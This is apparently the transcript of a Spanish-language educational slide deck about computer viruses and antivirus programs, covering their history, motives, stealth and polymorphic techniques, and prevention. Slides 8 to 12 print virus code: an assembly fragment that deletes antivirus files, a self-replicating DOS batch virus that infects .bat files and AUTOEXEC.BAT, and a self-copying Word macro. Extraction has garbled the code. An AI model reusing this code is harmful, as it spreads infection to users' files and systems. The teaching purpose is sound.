Virus y Antivirus - PowerPoint PPT Presentation

1 / 27
About This Presentation
Title:

Virus y Antivirus

Description:

Este c digo se graba en un archivo y se pasa por un programa ensamblador y linkador, que lo convierte en ejecutable, es decir, con extensi n, .EXE o .COM. – PowerPoint PPT presentation

Number of Views:57
Avg rating:3.0/5.0
Slides: 28
Provided by: wladimir84
Category:

less

Transcript and Presenter's Notes

Title: Virus y Antivirus


1
Virus y Antivirus
2
Qué es un Virus?
  • Es un programa que por sus características
    semejantes a un virus biológico recibe este
    nombre. Son difíciles de detectar si no se
    tienen las herramientas adecuadas y una de sus
    funciones principales es la reproducirse, por lo
    que pueden dañar la información de tus discos al
    reproducirse sobre tus archivos.

3
Estos programas tienen por características
  • Auto-reproducción.- esta es la capacidad del
    programa de sacar una copia de sí mismo sin
    consentimiento del usuario.
  • Infección.- esta es la capacidad del programa de
    alojarse por si mismo en otros programas,
    diferentes a los que lo portaba.

4
Dependiendo del tipo de virus también pueden
  • Dañar Archivos
  • Estos archivos siguen existiendo, pero la
    información que contienen no tiene sentido
    alguno, o bien no existe.

5
  • Dañar Discos
  • Esto va tanto a los disquetes como a los discos
    duros, existen virus que sobrecalientan los
    discos, que los aceleran para disminuir su tiempo
    de vida, que los rayan (a fuerza de tanto leer
    sobre ellos), etc.
  • Dañar Estructura de Disco
  • Esto es, que ni los archivos, ni los disquetes
    son dañados de uno por uno, sino que
    simplemente formatean el contenido del disco.

6
Connotación Científica
  • Virii.- con este termino se hace referencia al
    estudio y desarrollo de virus informáticos. Tras
    esta palabra se esconde toda una filosofía
    informática.

7
Cómo es un virus?
  • Un virus no es mas que un conjunto de
    instrucciones de programación.
  • Habitualmente los virus se programan en lenguaje
    de muy bajo nivel (Ensamblador), pero podemos
    encontrar virus programados en C, Visual Basic, o
    lenguaje de Macros de Word o Excel, por ejemplo.

8
El código de un virus seria este
  • Install_check cmp esi, ANTI je reponde_cabron
    jmp crypt_leave21hreponde_cabron pushf
    Interrupt 21h call dword ptr csold21h mov
    esi,ETA call delete_file ANTI-VIR.DAT files
    mov dx,offset del_this_shit02 AndCHKLIST.MS
    shit call delete_file call free_24h_03h jmp
    exit21h

9
Estas instrucciones son incomprensibles para una
persona que no conozca el lenguaje ensamblador.
Pertenecen al virus ANTI-ETA. Naturalmente y por
razones obvias este no es todo el código del
virus, es solo una pequeña parte del mismo. Este
código se graba en un archivo y se pasa por un
programa ensamblador y linkador, que lo convierte
en ejecutable, es decir, con extensión, .EXE o
.COM. Después el virus se ejecuta e inicia el
proceso de infección.
10
Bat Virus (DOS)
  • Mi BAT-Virus se llama HARL y se divide en 4
    partesla unola dosla tresy la cuatro. Es
    broma ). Se divide en 4 partesHarl. La de la
    primera ejecución en un ordenador
    "limpio".Harlbus. La que busca otros archivos
    bat para infectarlos.HarlInf. La que los
    infecta.y Harlvir. La que actúa el día indicado
    para... PARA NADA, MALPENSADOS!Veamos el
    codigo----------------------------------
    harl.bat -------------------------------harl_A
    _at_echo offharlif '1'V goto harlvirif
    '1'I goto harlInfif exist C\harl.bat goto
    harlbusif not exist 0.bat goto harlfinfind /i
    "harl"lt0.batgtgtC\harl.batattrib C\harl.bat
    hfind /i "harl"nul

11
Continua el codigo...
  • if not errorlevel 1 goto harlfinset
    harl_P"harl_A"find /i harl_PgtC\AUTOEXEC.BATs
    et harl_Pgoto harlfinecho.harl_Adatefind
    "22"gtnulif not errorlevel 1 call c\harl.bat
    Vharl_AharlInffind /i "harl"lt2gtnulif not
    errorlevel 1 goto harlfintype C\harl.batgtgt2got
    o harlfinharlvirREM Poner aqui algo
    interesantegoto harlfinharlbusfor f in
    (.\.bat ..\.bat C\.bat) do call c\harl.bat I
    fgoto harlfinharlfin

12
Virus de Macro.
  • Sub MAIN DIM dlg As FileSaveAs GetCurValues
    dlg ToolsOptionsSave.GlobalDotPrompt0
    Ifcheckit(0)0 Then MacroCopy FileName()
    "autoopen", "globalautoopen" End If

13
Quién creo los virus?
  • Según se dice, los virus fueron creados como una
    forma de protección contra la piratería es
    decir, los autores de los programas comerciales,
    vendían sus productos que contenían un virus
    inactivo, pero que se activa al momento de
    copiar ilegalmente los programas.

14
  • La interesante historia del virus del computador
    ha existido en la ciencia- ficción desde los años
    60. En aquella época, por supuesto, era justa una
    fantasía de los autores. No era hasta la
    revolución del computador de los años ochenta que
    hicieron una realidad. En 1983 el Dr. Frederick
    Cohen experimentó en la universidad de
    Pennsylvania con código virus.

15
  • Se originaron en 1986 con la creación del
    cerebro, el primer virus para las computadoras
    personales. Dos hermanos lo escribieron Basid y
    Farooq Alvi, que ejecutó una casa de software
    lógica pequeña en Lahore, Paquistán y comenzaron
    la raza entre los virus y los programas del
    antivirus que todavía continúa hoy.

16
Por qué se crea un virus?
  • La gran mayoría de los creadores de virus lo ven
    como un hobby, aunque también otros usan los
    virus como un medio de propaganda o difusión de
    sus quejas o ideas radicales, como por ejemplo el
    virus Telefónica, que emitía un mensaje de
    protesta contra las tarifas de esta compañía a la
    vez que reclamaba un mejor servicio, o el

17
  • famosísimo Silvia que sacaba por pantalla la
    dirección de una chica que al parecer no tuvo una
    buena relación con el programador del virus. En
    otras ocasiones es el orgullo, o la
    competitividad entre los programadores de virus
    lo que les lleva a desarrollar virus cada vez más
    destructivos y difíciles de controlar.

18
Técnicas de los virus
Técnicas Stealth
  • Son técnicas furtivas que utilizan para pasar
    desapercibidos al usuario y a los antivirus.
    Habitualmente los virus ocultan el tamaño real de
    los archivos que han contaminado, de forma que si
    digitamos el comando (DIR) la información de los
    tamaño de los archivos puede ser falsa.

19
Técnicas Antidebuggers
  • Un debugger es un programa que permite
    descompilar programas ejecutables y mostrar
    parte de su código en lenguaje original. Los
    virus usan técnicas para evitar ser
    desensamblados y así impedir su análisis para la
    fabricación del antivirus correspondiente.

20
Técnicas Polimorfismo o Auto mutación
  • Es una técnica que consiste en variar el código
    vírico en cada infección (mas o menos lo que se
    hace el virus del sida en los humanos con su capa
    proteica). Esto obliga a los antivirus a usar
    técnicas heurísticas ya que como el virus cambia
    en cada infección es imposible localizarlo
    buscándolo por cadenas de códigos.

21
  • Esto se consigue utilizando un algoritmo de
    encriptación que pone las cosas muy difíciles a
    los antivirus. No obstante no se puede codificar
    todo el código del virus, siempre debe quedar
    una parte sin mutar que toma el control y esa
    es la parte más vulnerable al antivirus.

22
Técnicas TSR
  • Los programas residentes en memoria (TSR)
    permanecen alojados en esta durante toda su
    ejecución.
  • Los virus utilizan esta técnica para mantener el
    control sobre todas las actividades del sistema y
    contaminar todo lo que encuentren a su paso. El
    virus permanece en memoria mientras la
    computadora permanezca encendido. Por eso una de
    las primeras cosas que hace al llegar a la
    memoria es contaminar los archivos de arranque
    del sistema para asegurarse de que cuando se
    vuelva a arrancar la computadora volverá a ser
    cargado en memoria.

23
Cómo se transmiten los virus en el computador?
  • Anteriormente, solo podían infectarse archivos de
    sistemas es decir, comandos externos (.com) y
    programas ejecutables (.exe), por lo que
    solamente se podían infectar los discos si se
    utilizaba una computadora que tuviera virus en
    memoria de sistema o se ejecuta un programa
    infectado.

24
Actualmente los virus pueden transmitirse a
través de archivos de casi cualquier tipo,
incluyendo documentos de word, hojas de cálculos
o archivos (.zip).
  • Basta con leer con tu procesador uno de estos
    archivos para que tu programa cargue el virus a
    memoria y lo haga parte de sí, infectando todos
    los archivos que leas en adelante.

25
Qué es un Antivirus?
  • Es un programa que detecta y elimina los virus de
    las computadoras y es necesario que se instale un
    antivirus en cuanto uno compre un computador, en
    algunos casos las empresas instalan un antivirus,
    si el virus no se elimina lo recomendable es
    eliminar el archivo.

26
Cómo puedo evitar una infección por un virus?
  • Colocando la muesca de protección contra
    escritura en tus discos flexibles cuando los
    utilices en una computadora que no sea la tuya
  • Evitando copiar software ilegalmente.
  • Revisando con un antivirus todos los discos que
    uses en tu computadora antes de trabajar con
    ellos.

27
  • Si utilizas una computadora, que esta prendida
    lo recomendable es que lo apagues, esperar un
    momento y encenderla antes de trabajar con ellos,
    para eliminar la posibilidad de que alguien haya
    dejado un virus en memoria.

Regresar a la lista de temas
Regresar a la página principal
Write a Comment
User Comments (0)
About PowerShow.com